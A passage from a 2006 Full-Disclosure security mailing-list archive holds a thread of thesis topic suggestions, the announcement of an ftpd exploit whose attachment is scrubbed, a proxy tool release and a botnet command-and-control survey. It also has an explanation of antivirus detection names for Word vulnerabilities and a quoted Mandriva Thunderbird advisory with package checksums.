> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.5 (Darwin)

iD8DBQFFgzAMt+Si58vRtJARAqpBAKCfgFJVAmrKNKqf0v0prg2YbupjfACgo1g1
hylhuBgjFPhJ0QYXoS1XMXs=
=DWHp
-----END PGP SIGNATURE-----



From bill.stout at greenborder.com  Sat Dec 16 00:16:50 2006
From: bill.stout at greenborder.com (Bill Stout)
Date: Fri, 15 Dec 2006 16:16:50 -0800
Subject: [Full-disclosure] [OOT] Thesis for master degree
In-Reply-To: <828af05c0612150144x5fac7141qee559e4d3abff5b2@mail.gmail.com>
Message-ID: <1FA45C2E5F2E4B46967415DA3A804FE88125D9@mail.greenborder.com>

Here are a few ideas:

 

- The threat of rogue Virtual machines - the inside man

- Disassembling Vista Security

- Investigating organized computer crime

- The mythical network perimeter

- Data flow analysis of confidential information within corporations

- Distribution and access of personal data

 

Just suggestions, but your thesis should be of a topic which is a
passion for you and holds your interest.  Your thesis topic may affect
your next few years of employment, so invest in something that will be
around for awhile (don't write about a technology approaching end of
life).

 

Bill Stout

 

________________________________

From: full-disclosure-bounces at lists.grok.org.uk
[mailto:full-disclosure-bounces at lists.grok.org.uk] On Behalf Of Fajar
Edisya Putera
Sent: Friday, December 15, 2006 1:45 AM
To: full-disclosure at lists.grok.org.uk
Subject: [Full-disclosure] [OOT] Thesis for master degree

 

Hello everyone, sorry for wasting your bandwidth

I'm currently trying to find an interesting topic in computer networking
security for my master degree thesis, I've read a lot of jurnal that
related with computer networking and security. All journal seem to
advanced for me, sometimes the journal has mathematical formula that I
don't understand what is the point for. Maybe someone here willing to
help me? an idea? or another journal website? 

Thanks
Sincerely yours
Fajar

-------------- next part --------------
An HTML attachment was scrubbed...
URL: http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20061215/fa897403/attachment.html 

From kingcope at gmx.net  Sat Dec 16 04:27:13 2006
From: kingcope at gmx.net (kcope)
Date: Sat, 16 Dec 2006 05:27:13 +0100
Subject: [Full-disclosure] ftpd ld.so.preload fun
Message-ID: <20061216042713.235360@gmx.net>

Hello this is kingcope,
attached is an example exploit


-- 
"Ein Herz f?r Kinder" - Ihre Spende hilft! Aktion: www.deutschlandsegelt.de
Unser Dankesch?n: Ihr Name auf dem Segel der 1. deutschen America's Cup-Yacht!
-------------- next part --------------
A non-text attachment was scrubbed...
Name: ftpd-ldpreload.pl
Type: application/octet-stream
Size: 2733 bytes
Desc: not available
Url : http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20061216/91666f7f/attachment.obj 

From dave at bindshell.net  Sat Dec 16 13:59:52 2006
From: dave at bindshell.net (Dave)
Date: Sat, 16 Dec 2006 13:59:52 +0000
Subject: [Full-disclosure] Odysseus 2.0 / Telemachus 1.0 (Beta)
Message-ID: <20061216135952.GA16833@bindshell.net>

Everyone's favourite native Win32 proxy: Bigger, better, faster, more...

	http://www.bindshell.net/odysseus

And announcing Telemachus, a companion utility for Odysseus, allowing
further analysis and manipulation of the HTTP transactions that have passed
through Odysseus.

Telemachus can communicate with the currently active instance of Odysseus,
or alternately load a previously saved Odysseus activity log file.

Although primarily designed to be used in conjunction with Odysseus,
Telemachus can be used as stand-alone utility.

	http://www.bindshell.net/telemachus



From c2report at isotf.org  Fri Dec 15 22:18:04 2006
From: c2report at isotf.org (c2report at isotf.org)
Date: Fri, 15 Dec 2006 16:18:04 -0600
Subject: [Full-disclosure] Drone Armies C&C Report - 15 Dec 2006
Message-ID: <200612152218.kBFMI40S027225@mwpbu.baylor.edu>



This is a periodic public report from the ISOTF's affiliated group 'DA'
(Drone Armies (botnets) research and mitigation mailing list / TISF
DA) with the ISOTF affiliated ASreport project (TISF / RatOut).

For this report it should be noted that we base our analysis on the data
we have accumulated from various sources, which may be incomplete.

Any responsible party that wishes to receive reports of botnet command
and control servers on their network(s) regularly and directly, feel
free to contact us.

For purposes of this report we use the following terms
open	the host completed the TCP handshake
closed	No activity detected
reset	issued a RST

This month's survey is of 4898 unique, domains (or IPs) with
port suspect C&Cs. This list is extracted from the BBL which
has a historical base of 14350 reported C&Cs. Of the suspect C&Cs
surveyed, 575 reported as Open, 1588 reported as closed,
and 805 issued resets to the survey instrument. Of the C&Cs 
listed by domain name in the our C&C database, 5867 are mitigated.

Top 20 ASNes by Total suspect domains mapping to a host in the ASN.
These numbers are determined by counting the number of domains which
resolve to a host in the ASN.  We do not remove duplicates and some of
the ASNs reported have many domains mapping to a single IP.  Note the
Percent_resolved figure is calculated using only the Total and Open
counts and does not represent a mitigation effectiveness metric.
                                                                Percent_
ASN     Responsible Party                       Total   Open    Resolved
19318   NJIIX-AS-1 - NEW JERSEY INTERN            122     23     81
13301   UNITEDCOLO-AS Autonomous System of        116     37     68
30058   FDCSE FDCservers.net LLC                   48     13     73
23522   CIT-FOONET                                 48     19     60
16265   LEASEWEB AS                                43      7     84
 8560   SCHLUND-AS                                 42     32     24
 4766   KIXS-AS-KR                                 38      6     84
 9318   HANARO-AS                                  36     15     58
 7132   SBC Internet Services                      36      6     83
  174   Cogent Communications                      34     28     18
 4837   CHINA169-Backbone                          32      6     81
13213   UK2NET-AS UK-2 Ltd Autonomous Syste        31      5     84
33597   InfoRelay Online Systems, Inc.             31      0    100
14744   PNAP Internap Network Services             30      0    100
15083   IIS-129 Infolink Information Servic        28      1     96
25761   STAMIN-2 Staminus Communications           26     11     58
 3561   Savvis                                     25      1     96
10913   PNAP Internap Network Services             25      0    100
24611   AS24611 Datacenter Luxembourg S.A.         24      0    100
 4314   IIS-64 I-55 INTERNET SERVICES              24      2     92

Top 20 ASNes by number of active suspect C&Cs.  These counts are
determined by the number of suspect domains or IPs located within
the ASN completed a connection request.
                                                                Percent_
ASN     Responsible Party                       Total   Open    Resolved
13301   UNITEDCOLO-AS Autonomous System of        116     37     68
 8560   SCHLUND-AS                                 42     32     24
  174   Cogent Communications                      34     28     18
19318   NJIIX-AS-1 - NEW JERSEY INTERN            122     23     81
23522   CIT-FOONET                                 48     19     60
 9318   HANARO-AS                                  36     15     58
30058   FDCSE FDCservers.net LLC                   48     13     73
25761   STAMIN-2 Staminus Communications           26     11     58
 3786   ERX-DACOMNET                               18      8     56
29737   WideOpenWest LLC                           11      8     27
 1781   KAIST-DAEJEON-AS-KR Korea Advanced         11      8     27
18942   WEBHO-3 WebHostPlus Inc                    11      7     36
16265   LEASEWEB AS                                43      7     84
 6939   HURRICANE - Hurricane Electric             11      6     45
 4766   KIXS-AS-KR                                 38      6     84
 4837   CHINA169-Backbone                          32      6     81
 7132   SBC Internet Services                      36      6     83
12322   PROXAD AS for Proxad ISP                    8      5     38
19444   CHARTER COMMUNICATIONS                      6      5     17
29686   PROBENETWORKS-AS Probe Networks             5      5      0

A version of this report with addition rankings can be found
via the isotf.org home page. 


Randal Vaughn                             Gadi  Evron
Professor                                 ge at linuxbox.org
Baylor University
Waco, TX
(254) 710 4756
randy_vaughn at baylor.edu



From jamella at 126.com  Sat Dec 16 14:27:47 2006
From: jamella at 126.com (jamella)
Date: Sat, 16 Dec 2006 22:27:47 +0800
Subject: [Full-disclosure] (no subject)
Message-ID: <200612162227448430590@126.com>

does anybody know Bloodhound.Exploit.106 and Bloodhound.Exploit.108 ?
-------------- next part --------------
An HTML attachment was scrubbed...
URL: http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20061216/5e29f8f0/attachment.html 

From juha-matti.laurio at netti.fi  Sat Dec 16 15:33:40 2006
From: juha-matti.laurio at netti.fi (Juha-Matti Laurio)
Date: Sat, 16 Dec 2006 17:33:40 +0200 (EET)
Subject: [Full-disclosure] Bloodhound.Exploit.106/108 detection Was:(no
 subject)
Message-ID: <27370911.803991166283221006.JavaMail.juha-matti.laurio@netti.fi>

Bloodhound.Exploit.106 is the name of Symantec's detection for the first, unpatched MS Word vulnerability
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-5994

and

Bloodhound.Exploit.108 is the name of Symantec's detection for the third, unpatched MS Word vulnerability
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-6561

The PoC Word document for issue #3 was publicly released on Tuesday 12th Dec.

See links included to CVEs for more details.

- Juha-Matti


jamella  wrote: 

> does anybody know Bloodhound.Exploit.106 and Bloodhound.Exploit.108 ?



From angray at beeb.net  Sat Dec 16 17:55:50 2006
From: angray at beeb.net (Aaron Gray)
Date: Sat, 16 Dec 2006 17:55:50 -0000
Subject: [Full-disclosure] [OOT] Thesis for master degree
References: <1FA45C2E5F2E4B46967415DA3A804FE88125D9@mail.greenborder.com>
Message-ID: <002e01c7213b$6cdabc90$0200a8c0@AMD2500>

>- Disassembling Vista Security

This is illegal. So not a very good idea for the thesis.

Aaron
-------------- next part --------------
An HTML attachment was scrubbed...
URL: http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20061216/6f2d78db/attachment.html 

From gigiyousef at hotmail.com  Sun Dec 17 05:28:42 2006
From: gigiyousef at hotmail.com (badr muhyeddin)
Date: Sun, 17 Dec 2006 07:28:42 +0200
Subject: [Full-disclosure] Full-Disclosure Digest, Vol 22, Issue 27
In-Reply-To: 
Message-ID: 

please,dont send me any other messages regarding the same subject


>From: full-disclosure-request at lists.grok.org.uk
>Reply-To: full-disclosure at lists.grok.org.uk
>To: full-disclosure at lists.grok.org.uk
>Subject: Full-Disclosure Digest, Vol 22, Issue 27
>Date: Sat, 16 Dec 2006 12:00:02 +0000
>
>Send Full-Disclosure mailing list submissions to
>	full-disclosure at lists.grok.org.uk
>
>To subscribe or unsubscribe via the World Wide Web, visit
>	https://lists.grok.org.uk/mailman/listinfo/full-disclosure
>or, via email, send a message with subject or body 'help' to
>	full-disclosure-request at lists.grok.org.uk
>
>You can reach the person managing the list at
>	full-disclosure-owner at lists.grok.org.uk
>
>When replying, please edit your Subject line so it is more specific
>than "Re: Contents of Full-Disclosure digest..."
>
>
>Note to digest recipients - when replying to digest posts, please trim your 
>post appropriately. Thank you.
>
>
>Today's Topics:
>
>    1. [ MDKSA-2006:206 ] - Updated Thunderbird packages	fix
>       multiple vulnerabilities (security at mandriva.com)
>    2. [OOT] Thesis for master degree (Fajar Edisya Putera)
>    3. [ MDKSA-2006:206 ] - Updated Thunderbird packages	fix
>       multiple vulnerabilities (security at mandriva.com)
>    4. Re: [OOT] Thesis for master degree (scott hollatz)
>    5. Re: [OOT] Thesis for master degree (xyberpix)
>    6. Re: [OOT] Thesis for master degree (Bill Stout)
>    7. ftpd ld.so.preload fun (kcope)
>
>
>----------------------------------------------------------------------
>
>Message: 1
>Date: Fri, 15 Dec 2006 14:36:00 -0700
>From: security at mandriva.com
>Subject: [Full-disclosure] [ MDKSA-2006:206 ] - Updated Thunderbird
>	packages	fix multiple vulnerabilities
>To: full-disclosure at lists.grok.org.uk
>Message-ID: 
>
>
>-----BEGIN PGP SIGNED MESSAGE-----
>Hash: SHA1
>
>  _______________________________________________________________________
>
>  Mandriva Linux Security Advisory                         MDKSA-2006:206
>  http://www.mandriva.com/security/
>  _______________________________________________________________________
>
>  Package : mozilla-thunderbird
>  Date    : November 9, 2006
>  Affected: 2007.0, Corporate 3.0
>  _______________________________________________________________________
>
>  Problem Description:
>
>  A number of security vulnerabilities have been discovered and corrected
>  in the latest Mozilla Thunderbird program, version 1.5.0.8.
>
>  This update provides the latest Thunderbird to correct these issues.
>  _______________________________________________________________________
>
>  References:
>
>  http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-5462
>  http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-5463
>  http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-5464
>  http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-5747
>  http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-5748
>  http://www.mozilla.org/security/announce/2006/mfsa2006-65.html
>  http://www.mozilla.org/security/announce/2006/mfsa2006-66.html
>  http://www.mozilla.org/security/announce/2006/mfsa2006-67.html
>  _______________________________________________________________________
>
>  Updated Packages:
>
>  Mandriva Linux 2007.0:
>  488e65dfe45ecf7e3a9e1a3dedd5c2ce  
>2007.0/i586/mozilla-thunderbird-1.5.0.8-1.1mdv2007.0.i586.rpm
>  5e551ab45061148722dda1d7ce66959e  
>2007.0/i586/mozilla-thunderbird-bg-1.5.0.8-1.1mdv2007.0.i586.rpm
>  2149a7fd629b8bc6843c6fdf1bb49efb  
>2007.0/i586/mozilla-thunderbird-ca-1.5.0.8-1.1mdv2007.0.i586.rpm
>  0d2315b490e3b8dd2ab791bd6c3ee516  
>2007.0/i586/mozilla-thunderbird-cs-1.5.0.8-1.1mdv2007.0.i586.rpm
>  d5583d1b99b948c90e1cad62d753d67d  
>2007.0/i586/mozilla-thunderbird-da-1.5.0.8-1.1mdv2007.0.i586.rpm
>  00ec607c39d3de4c589997d6c7ee6679  
>2007.0/i586/mozilla-thunderbird-de-1.5.0.8-1.1mdv2007.0.i586.rpm
>  6d1f0f2576362a0bb90b4f9d8c4f2153  
>2007.0/i586/mozilla-thunderbird-devel-1.5.0.8-1.1mdv2007.0.i586.rpm
>  2cb0e44d2e3f7fddd60249843204403f  
>2007.0/i586/mozilla-thunderbird-el-1.5.0.8-1.1mdv2007.0.i586.rpm
>  0c3c771882698d5651775aeed24bfd73  
>2007.0/i586/mozilla-thunderbird-enigmail-1.5.0.8-1.1mdv2007.0.i586.rpm
>  477ca905391c1d555d0136d46d557869  
>2007.0/i586/mozilla-thunderbird-enigmail-ca-1.5.0.8-1.1mdv2007.0.i586.rpm
>  741811dd392d942b27e1b3b0de695d4e  
>2007.0/i586/mozilla-thunderbird-enigmail-cs-1.5.0.8-1.1mdv2007.0.i586.rpm
>  7c2c4922c6a2c6ce2cb6108a95f7dbfa  
>2007.0/i586/mozilla-thunderbird-enigmail-de-1.5.0.8-1.1mdv2007.0.i586.rpm
>  7cbf9f3218d587ef97edf01f2298096b  
>2007.0/i586/mozilla-thunderbird-enigmail-el-1.5.0.8-1.1mdv2007.0.i586.rpm
>  7dbd9e4c16db82a761a7b502c1f7f22d  
>2007.0/i586/mozilla-thunderbird-enigmail-es-1.5.0.8-1.1mdv2007.0.i586.rpm
>  b6dd6119216f6b748ee7c1570c3b8c37  
>2007.0/i586/mozilla-thunderbird-enigmail-es_AR-1.5.0.8-1.1mdv2007.0.i586.rpm
>  1eea732e08ca0ef96796c3f50abb1f77  
>2007.0/i586/mozilla-thunderbird-enigmail-fi-1.5.0.8-1.1mdv2007.0.i586.rpm
>  e1cc5cf2496581d776bb43e2f0dbbea6  
>2007.0/i586/mozilla-thunderbird-enigmail-fr-1.5.0.8-1.1mdv2007.0.i586.rpm
>  af86ce82ff9053250f82f2215c8dd7e5  
>2007.0/i586/mozilla-thunderbird-enigmail-hu-1.5.0.8-1.1mdv2007.0.i586.rpm
>  6319633c561c7f68c6614685126da02b  
>2007.0/i586/mozilla-thunderbird-enigmail-it-1.5.0.8-1.1mdv2007.0.i586.rpm
>  56387829c6cc83882246e68e3b8704b0  
>2007.0/i586/mozilla-thunderbird-enigmail-ja-1.5.0.8-1.1mdv2007.0.i586.rpm
>  56cb838bb0c375f53d3cff2eb76a1118  
>2007.0/i586/mozilla-thunderbird-enigmail-nb-1.5.0.8-1.1mdv2007.0.i586.rpm
>  253500598ff56ab85394e68708ace21d  
>2007.0/i586/mozilla-thunderbird-enigmail-nl-1.5.0.8-1.1mdv2007.0.i586.rpm
>  53b4d4f1aa4e8174a33a0ed436ce961a  
>2007.0/i586/mozilla-thunderbird-enigmail-pl-1.5.0.8-1.1mdv2007.0.i586.rpm
>  fb9dd6933d27029538cd01a64ec55cee  
>2007.0/i586/mozilla-thunderbird-enigmail-pt-1.5.0.8-1.1mdv2007.0.i586.rpm
>  701b9837303a3ed79e6c74c037c28926  
>2007.0/i586/mozilla-thunderbird-enigmail-pt_BR-1.5.0.8-1.1mdv2007.0.i586.rpm
>  b3739c1344770e92864c50f131f08884  
>2007.0/i586/mozilla-thunderbird-enigmail-ru-1.5.0.8-1.1mdv2007.0.i586.rpm
>  1efe7ebc2a71e2f2d6c2785026a6e7ac  
>2007.0/i586/mozilla-thunderbird-enigmail-sk-1.5.0.8-1.1mdv2007.0.i586.rpm
>  6860352b37999652aab785a266673e2f  
>2007.0/i586/mozilla-thunderbird-enigmail-sl-1.5.0.8-1.1mdv2007.0.i586.rpm
>  51abe323b14793097935b0c221e64f71  
>2007.0/i586/mozilla-thunderbird-enigmail-sv-1.5.0.8-1.1mdv2007.0.i586.rpm
>  b8ec884437a460c9fbb5c71db6a46c31  
>2007.0/i586/mozilla-thunderbird-enigmail-zh_CN-1.5.0.8-1.1mdv2007.0.i586.rpm
>  9ae4fb1871ee29f3f7b52210c0cf4e1b  
>2007.0/i586/mozilla-thunderbird-es-1.5.0.8-1.1mdv2007.0.i586.rpm
>  e1a31b03ffef8e86df09579296fce3c9  
>2007.0/i586/mozilla-thunderbird-es_AR-1.5.0.8-1.1mdv2007.0.i586.rpm
>  6b4bdbb4648231b128655e56015621c7  
>2007.0/i586/mozilla-thunderbird-eu-1.5.0.8-1.1mdv2007.0.i586.rpm
>  d333252ee1ba51351762e4050565ecb1  
>2007.0/i586/mozilla-thunderbird-fi-1.5.0.8-1.1mdv2007.0.i586.rpm
>  0a2828dbab70a2be0e721cc016f93d7f  
>2007.0/i586/mozilla-thunderbird-fr-1.5.0.8-1.1mdv2007.0.i586.rpm
>  defa2ac291c66f693946362bd2501c40  
>2007.0/i586/mozilla-thunderbird-ga-1.5.0.8-1.1mdv2007.0.i586.rpm
>  c5540aa8289eefbf3e708e442de77aa8  
>2007.0/i586/mozilla-thunderbird-gu_IN-1.5.0.8-1.1mdv2007.0.i586.rpm
>  45da9968c4661ef994ef1dcefd0ad54f  
>2007.0/i586/mozilla-thunderbird-he-1.5.0.8-1.1mdv2007.0.i586.rpm
>  df8d2ea1013a65457aa1f2100060d968  
>2007.0/i586/mozilla-thunderbird-hu-1.5.0.8-1.1mdv2007.0.i586.rpm
>  f87f2441b2ca36d4f5c3f3f2dd04b3bb  
>2007.0/i586/mozilla-thunderbird-it-1.5.0.8-1.1mdv2007.0.i586.rpm
>  bc3a281fbc5c09b7f962dfb1d3b9e517  
>2007.0/i586/mozilla-thunderbird-ja-1.5.0.8-1.1mdv2007.0.i586.rpm
>  2563050985477697472069d08e96de0f  
>2007.0/i586/mozilla-thunderbird-ko-1.5.0.8-1.1mdv2007.0.i586.rpm
>  e22be985ae58ab3eba5b90aa6a3eb58e  
>2007.0/i586/mozilla-thunderbird-lt-1.5.0.8-1.1mdv2007.0.i586.rpm
>  fde0d1b9c4feee3c1e239345f4065090  
>2007.0/i586/mozilla-thunderbird-mk-1.5.0.8-1.1mdv2007.0.i586.rpm
>  10be2386887a6c70bc4f9c0453b33072  
>2007.0/i586/mozilla-thunderbird-nb-1.5.0.8-1.1mdv2007.0.i586.rpm
>  1c92d5ee79fc52ec1525f3c96dfa1916  
>2007.0/i586/mozilla-thunderbird-nl-1.5.0.8-1.1mdv2007.0.i586.rpm
>  42e6ddb4a33a297c71b996bf651a4d69  
>2007.0/i586/mozilla-thunderbird-pa_IN-1.5.0.8-1.1mdv2007.0.i586.rpm
>  96394d1245284a886b954bb063c0ab5b  
>2007.0/i586/mozilla-thunderbird-pl-1.5.0.8-1.1mdv2007.0.i586.rpm
>  8386317130e064260bd8b114616410ed  
>2007.0/i586/mozilla-thunderbird-pt_BR-1.5.0.8-1.1mdv2007.0.i586.rpm
>  eb622e8adc0767e090a608e80a1611b7  
>2007.0/i586/mozilla-thunderbird-ru-1.5.0.8-1.1mdv2007.0.i586.rpm
>  3ca6736aaf725851a0be21f0490aeb20  
>2007.0/i586/mozilla-thunderbird-sk-1.5.0.8-1.1mdv2007.0.i586.rpm
>  47b16b8c45acc936b62051594ed87c69  
>2007.0/i586/mozilla-thunderbird-sl-1.5.0.8-1.1mdv2007.0.i586.rpm
>  c2e742162882c52761040025ff4ddfff  
>2007.0/i586/mozilla-thunderbird-sv-1.5.0.8-1.1mdv2007.0.i586.rpm
>  072c5224bd49a45ba7ab0a57f657ec6e  
>2007.0/i586/mozilla-thunderbird-tr-1.5.0.8-1.1mdv2007.0.i586.rpm
>  3393e810730d305adc4fe8ecc98b782a  
>2007.0/i586/mozilla-thunderbird-zh_CN-1.5.0.8-1.1mdv2007.0.i586.rpm
>  70882501b0fc01a56cee67c2b7c63ac5  
>2007.0/i586/nsinstall-1.5.0.8-1.1mdv2007.0.i586.rpm
>  e408368ca02e7efbbece9adbaaea7d56  
>2007.0/SRPMS/mozilla-thunderbird-1.5.0.8-1.1mdv2007.0.src.rpm
>  7867a124b85e4a8098ec7b814267c1f5  
>2007.0/SRPMS/mozilla-thunderbird-enigmail-l10n-1.5.0.8-1.1mdv2007.0.src.rpm
>  e776e0c4c5a6ff592af0c346bf8b4511  
>2007.0/SRPMS/mozilla-thunderbird-l10n-1.5.0.8-1.1mdv2007.0.src.rpm
>
>  Mandriva Linux 2007.0/X86_64:
>  47aa8c7af46ee44f1b51e0f44772beeb  
>2007.0/x86_64/mozilla-thunderbird-1.5.0.8-1.1mdv2007.0.x86_64.rpm
>  e284b46733e04ab96cccb612de04e5a8  
>2007.0/x86_64/mozilla-thunderbird-bg-1.5.0.8-1.1mdv2007.0.x86_64.rpm
>  e73efd093c48aa82d6f73025f1ade443  
>2007.0/x86_64/mozilla-thunderbird-ca-1.5.0.8-1.1mdv2007.0.x86_64.rpm
>  ed790bdd1a45343b427925765f5f2b5c  
>2007.0/x86_64/mozilla-thunderbird-cs-1.5.0.8-1.1mdv2007.0.x86_64.rpm
>  61690a97ef04b6083693ffe4a9ab3176  
>2007.0/x86_64/mozilla-thunderbird-da-1.5.0.8-1.1mdv2007.0.x86_64.rpm
>  889574eda89385739aad6eda7f3d2604  
>2007.0/x86_64/mozilla-thunderbird-de-1.5.0.8-1.1mdv2007.0.x86_64.rpm
>  ef9b59cdd619da74737b5e91e4067386  
>2007.0/x86_64/mozilla-thunderbird-devel-1.5.0.8-1.1mdv2007.0.x86_64.rpm
>  e20a88ece32f8ee81aaedd828558d880  
>2007.0/x86_64/mozilla-thunderbird-el-1.5.0.8-1.1mdv2007.0.x86_64.rpm
>  250f6f86984922da278774d480ba37a7  
>2007.0/x86_64/mozilla-thunderbird-enigmail-1.5.0.8-1.1mdv2007.0.x86_64.rpm
>  f683dba38c9055cbac36f8468e357ebf  
>2007.0/x86_64/mozilla-thunderbird-enigmail-ca-1.5.0.8-1.1mdv2007.0.x86_64.rpm
>  6594d0bb3f7770f168728827c1cf9f83  
>2007.0/x86_64/mozilla-thunderbird-enigmail-cs-1.5.0.8-1.1mdv2007.0.x86_64.rpm
>  1ee011c3c94c7b081f53b9a55996da0c  
>2007.0/x86_64/mozilla-thunderbird-enigmail-de-1.5.0.8-1.1mdv2007.0.x86_64.rpm
>  be24dd32e628b8294c1b87d200cf02dd  
>2007.0/x86_64/mozilla-thunderbird-enigmail-el-1.5.0.8-1.1mdv2007.0.x86_64.rpm
>  020acf8e510080a701c6278c6eb862ae  
>2007.0/x86_64/mozilla-thunderbird-enigmail-es-1.5.0.8-1.1mdv2007.0.x86_64.rpm
>  af4c92e4f3eaf833111572ead14c8c04  
>2007.0/x86_64/mozilla-thunderbird-enigmail-es_AR-1.5.0.8-1.1mdv2007.0.x86_64.rpm
>  7483c3a55198fcbc9be2c9750919a370  
>2007.0/x86_64/mozilla-thunderbird-enigmail-fi-1.5.0.8-1.1mdv2007.0.x86_64.rpm
>  753acdb58e6400659dab48ff78f371e7  
>2007.0/x86_64/mozilla-thunderbird-enigmail-fr-1.5.0.8-1.1mdv2007.0.x86_64.rpm
>  fb83f542bd12edda5e85d9873a08a938  
>2007.0/x86_64/mozilla-thunderbird-enigmail-hu-1.5.0.8-1.1mdv2007.0.x86_64.rpm
>  996bbfb13654cfc2180036ea6b1e61df  
>2007.0/x86_64/mozilla-thunderbird-enigmail-it-1.5.0.8-1.1mdv2007.0.x86_64.rpm
>  ff6217b99ab96a1444b6a758bf184ecf  
>2007.0/x86_64/mozilla-thunderbird-enigmail-ja-1.5.0.8-1.1mdv2007.0.x86_64.rpm
>  f15d9f053011068deba71fdc05dc6d46  
>2007.0/x86_64/mozilla-thunderbird-enigmail-nb-1.5.0.8-1.1mdv2007.0.x86_64.rpm
>  98f63b0dedef781ec16f8bebb6a032cb  
>2007.0/x86_64/mozilla-thunderbird-enigmail-nl-1.5.0.8-1.1mdv2007.0.x86_64.rpm
>  e5e42bb849d26a4f59fb6204d6ed9850  
>2007.0/x86_64/mozilla-thunderbird-enigmail-pl-1.5.0.8-1.1mdv2007.0.x86_64.rpm
>  8bc9d56d4778baf40b115eb805a506b3  
>2007.0/x86_64/mozilla-thunderbird-enigmail-pt-1.5.0.8-1.1mdv2007.0.x86_64.rpm
>  21c7d7ffd14a724e4ce9d96e99d0f3c7  
>2007.0/x86_64/mozilla-thunderbird-enigmail-pt_BR-1.5.0.8-1.1mdv2007.0.x86_64.rpm
>  9b115831c8ae36d7141c93a9d867d445  
>2007.0/x86_64/mozilla-thunderbird-enigmail-ru-1.5.0.8-1.1mdv2007.0.x86_64.rpm
>  d6efb3cdaba13c17dd31147011796614  
>2007.0/x86_64/mozilla-thunderbird-enigmail-sk-1.5.0.8-1.1mdv2007.0.x86_64.rpm
>  4239765036a0bffaa4fcff9fb076a221  
>2007.0/x86_64/mozilla-thunderbird-enigmail-sl-1.5.0.8-1.1mdv2007.0.x86_64.rpm
>  be87cc456600cb0dc18730ae3f75af92  
>2007.0/x86_64/mozilla-thunderbird-enigmail-sv-1.5.0.8-1.1mdv2007.0.x86_64.rpm
>  459367e42865a1de4374d2a9b8c36232  
>2007.0/x86_64/mozilla-thunderbird-enigmail-zh_CN-1.5.0.8-1.1mdv2007.0.x86_64.rpm
>  1e1b30720806b2c6ab650251f9756127  
>2007.0/x86_64/mozilla-thunderbird-es-1.5.0.8-1.1mdv2007.0.x86_64.rpm
>  70c5525bea63d291374706abfb4523c4  
>2007.0/x86_64/mozilla-thunderbird-es_AR-1.5.0.8-1.1mdv2007.0.x86_64.rpm
>  4addf81f6fdb0fe55d2274ba726d066e  
>2007.0/x86_64/mozilla-thunderbird-eu-1.5.0.8-1.1mdv2007.0.x86_64.rpm
>  9c9a1e6a7623a712f40666e77fd3f2b4  
>2007.0/x86_64/mozilla-thunderbird-fi-1.5.0.8-1.1mdv2007.0.x86_64.rpm
>  9cd9d0509bbe4d0bc7c092118253c237  
>2007.0/x86_64/mozilla-thunderbird-fr-1.5.0.8-1.1mdv2007.0.x86_64.rpm
>  b23236fc11caa38b1354893f1e9863e1  
>2007.0/x86_64/mozilla-thunderbird-ga-1.5.0.8-1.1mdv2007.0.x86_64.rpm
>  c5b898d7f04c26a34bb4223ee4547586  
>2007.0/x86_64/mozilla-thunderbird-gu_IN-1.5.0.8-1.1mdv2007.0.x86_64.rpm
>  8e114fec014131d472790035a1509783  
>2007.0/x86_64/mozilla-thunderbird-he-1.5.0.8-1.1mdv2007.0.x86_64.rpm
>  3eda3b36a83c550a1f52faf6adfb0b10  
>2007.0/x86_64/mozilla-thunderbird-hu-1.5.0.8-1.1mdv2007.0.x86_64.rpm
>  c336cc525567465d1649ee55c604d3a3  
>2007.0/x86_64/mozilla-thunderbird-it-1.5.0.8-1.1mdv2007.0.x86_64.rpm
>  476f974ea2e3b9ef971231b8b08e62f0  
>2007.0/x86_64/mozilla-thunderbird-ja-1.5.0.8-1.1mdv2007.0.x86_64.rpm
>  7878332de8134b9025b924315d6ffbf6  
>2007.0/x86_64/mozilla-thunderbird-ko-1.5.0.8-1.1mdv2007.0.x86_64.rpm
>  7602f9099c26d60e934f54918dd38e46  
>2007.0/x86_64/mozilla-thunderbird-lt-1.5.0.8-1.1mdv2007.0.x86_64.rpm
>  52ba4b91175db4376fd4c4e9018969c3  
>2007.0/x86_64/mozilla-thunderbird-mk-1.5.0.8-1.1mdv2007.0.x86_64.rpm
>  1e2bc31ee83c5c47f06953aba976a27d  
>2007.0/x86_64/mozilla-thunderbird-nb-1.5.0.8-1.1mdv2007.0.x86_64.rpm
>  47b180beb65802e89f7e6a8be7f33d15  
>2007.0/x86_64/mozilla-thunderbird-nl-1.5.0.8-1.1mdv2007.0.x86_64.rpm
>  6485a71b5d07fef3e337630aa53bb4c6  
>2007.0/x86_64/mozilla-thunderbird-pa_IN-1.5.0.8-1.1mdv2007.0.x86_64.rpm
>  6b5df9cad533fc75fc47191df5f3dabf  
>2007.0/x86_64/mozilla-thunderbird-pl-1.5.0.8-1.1mdv2007.0.x86_64.rpm
>  99b61d660a72eff639f78ec0422aeaf2  
>2007.0/x86_64/mozilla-thunderbird-pt_BR-1.5.0.8-1.1mdv2007.0.x86_64.rpm
>  99cfe247978fe85b5b5186bf12247f3a  
>2007.0/x86_64/mozilla-thunderbird-ru-1.5.0.8-1.1mdv2007.0.x86_64.rpm
>  8c393629997cea717c2f1e8d077a9344  
>2007.0/x86_64/mozilla-thunderbird-sk-1.5.0.8-1.1mdv2007.0.x86_64.rpm
>  be518e4b4833e6cb9d083871101be35b  
>2007.0/x86_64/mozilla-thunderbird-sl-1.5.0.8-1.1mdv2007.0.x86_64.rpm
>  8dedff0ffd0e7b7721b256f01821f188  
>2007.0/x86_64/mozilla-thunderbird-sv-1.5.0.8-1.1mdv2007.0.x86_64.rpm
>  05202d61506a60981fb9a317ce6a5d5d  
>2007.0/x86_64/mozilla-thunderbird-tr-1.5.0.8-1.1mdv2007.0.x86_64.rpm
>  0deda88ec857fb0c11b57555814a20ec  
